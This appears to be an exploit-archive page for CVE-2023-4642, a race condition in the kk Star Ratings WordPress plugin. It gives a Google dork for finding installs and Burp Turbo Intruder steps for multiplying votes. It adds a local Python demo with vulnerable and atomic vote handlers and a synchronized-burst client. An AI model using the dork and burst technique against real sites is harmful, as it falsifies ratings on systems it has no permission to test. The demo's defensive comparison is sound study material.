Headline
KK Star Ratings Race Condition
KK Star Ratings versions prior to 5.4.6 suffer from rating tampering via a race condition vulnerability: the vote check and the vote write are not performed atomically, so concurrent submissions from one user are all counted.
# Exploit Title: kk Star Ratings < 5.4.6 - Rating Tampering via Race Condition
# Google Dork: inurl:/wp-content/plugins/kk-star-ratings/
# Date: 2023-11-06
# Exploit Author: Mohammad Reza Omrani
# Vendor Homepage: https://github.com/kamalkhan
# Software Link: https://wordpress.org/plugins/kk-star-ratings/
# WPScan: https://wpscan.com/vulnerability/6f481d34-6feb-4af2-914c-1f3288f69207/
# Version: 5.4.6
# Tested on: WordPress 6.2.2
# CVE: CVE-2023-4642

# POC:
1- Install and activate kk Star Ratings.
2- Go to the page that displays the star rating.
3- Using Burp and the Turbo Intruder extension, intercept the rating submission.
4- Send the request to Turbo Intruder using Action > Extensions > Turbo Intruder > Send to turbo intruder.
5- Drop the initial request and turn Intercept off.
6- In the Turbo Intruder window, add "%s" to the end of the Connection header (e.g. "Connection: close %s").
7- Use the `examples/race.py` script that ships with Turbo Intruder.
8- Click "Attack" at the bottom of the window. This sends multiple copies of the request to the server at the same moment, and each copy that wins the race is counted as a separate vote.
9- To see the updated rating total, reload the page you tested.
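The following is an added example, not the plugin's code (which is PHP) and not the Turbo Intruder script the PoC refers to. It models the non-atomic check-then-record pattern the CVE describes in a tiny local vote endpoint, a hardened variant of the same handler, and a client that releases a burst of identical vote requests at the same instant, which is what step 8 of the PoC achieves with Turbo Intruder's gate mechanism. The endpoint path, the request body and the in-memory store are constructed for the demo; the plugin's real request format and storage are not shown on this page.

```python
"""Added example (not the plugin's code): a vote endpoint with the non-atomic
check-then-record pattern behind CVE-2023-4642, a hardened variant, and a client
that fires N identical votes at the same moment. Endpoint path, body format and
the in-memory store are constructed for the demo."""
import threading
import time
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

RACE_WINDOW = 0.1  # simulated DB round-trip between the check and the write


class VoteStore:
    """In-memory stand-in for the plugin's vote storage (constructed for the demo)."""

    def __init__(self, atomic):
        self.atomic = atomic
        self.lock = threading.Lock()
        self.voters = set()
        self.total = 0

    def _check_then_record(self, voter):
        # Vulnerable pattern: the "already voted?" read and the write are two
        # separate steps, so concurrent requests can all pass the check.
        if voter in self.voters:
            return False
        time.sleep(RACE_WINDOW)
        self.voters.add(voter)
        self.total += 1
        return True

    def vote(self, voter):
        if self.atomic:
            # Hardened: check and update form one critical section. In a real
            # plugin the same effect comes from a DB unique constraint or a
            # single conditional UPDATE rather than a process-local lock.
            with self.lock:
                return self._check_then_record(voter)
        return self._check_then_record(voter)


class VoteHandler(BaseHTTPRequestHandler):
    store = None  # bound per server instance in run_race()

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        voter = self.rfile.read(length).decode() or self.client_address[0]
        accepted = self.store.vote(voter)
        body = b"accepted" if accepted else b"already voted"
        self.send_response(200 if accepted else 409)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def run_race(atomic, n=10):
    """Start a vote server, fire n synchronized votes from one voter, and return
    (votes recorded, sorted HTTP status codes seen by the client)."""
    store = VoteStore(atomic)
    handler = type("BoundHandler", (VoteHandler,), {"store": store})
    server = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    port = server.server_address[1]
    threading.Thread(target=server.serve_forever, daemon=True).start()

    barrier = threading.Barrier(n)
    statuses = []

    def fire():
        # Connect first, then wait at the barrier so every request leaves at
        # the same instant (the gate trick used by Turbo Intruder's race.py).
        conn = HTTPConnection("127.0.0.1", port, timeout=10)
        conn.connect()
        barrier.wait()
        conn.request("POST", "/?action=kk-star-ratings", body="voter-1")
        statuses.append(conn.getresponse().status)
        conn.close()

    threads = [threading.Thread(target=fire) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    server.shutdown()
    server.server_close()
    return store.total, sorted(statuses)


if __name__ == "__main__":
    print("non-atomic:", run_race(atomic=False))
    print("atomic:    ", run_race(atomic=True))
```

Against the non-atomic store, one voter's burst of ten requests is recorded as many votes because every handler reads "not yet voted" before any of them writes; against the atomic store exactly one request is accepted and the rest get 409. The same observation applies to the real target: after the Turbo Intruder attack, the rating total on the reloaded page moves by more than one vote on a vulnerable version.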
Related news
CVE-2023-4642
The kk Star Ratings WordPress plugin before 5.4.6 does not implement atomic operations, allowing one user to vote multiple times on a poll due to a Race Condition.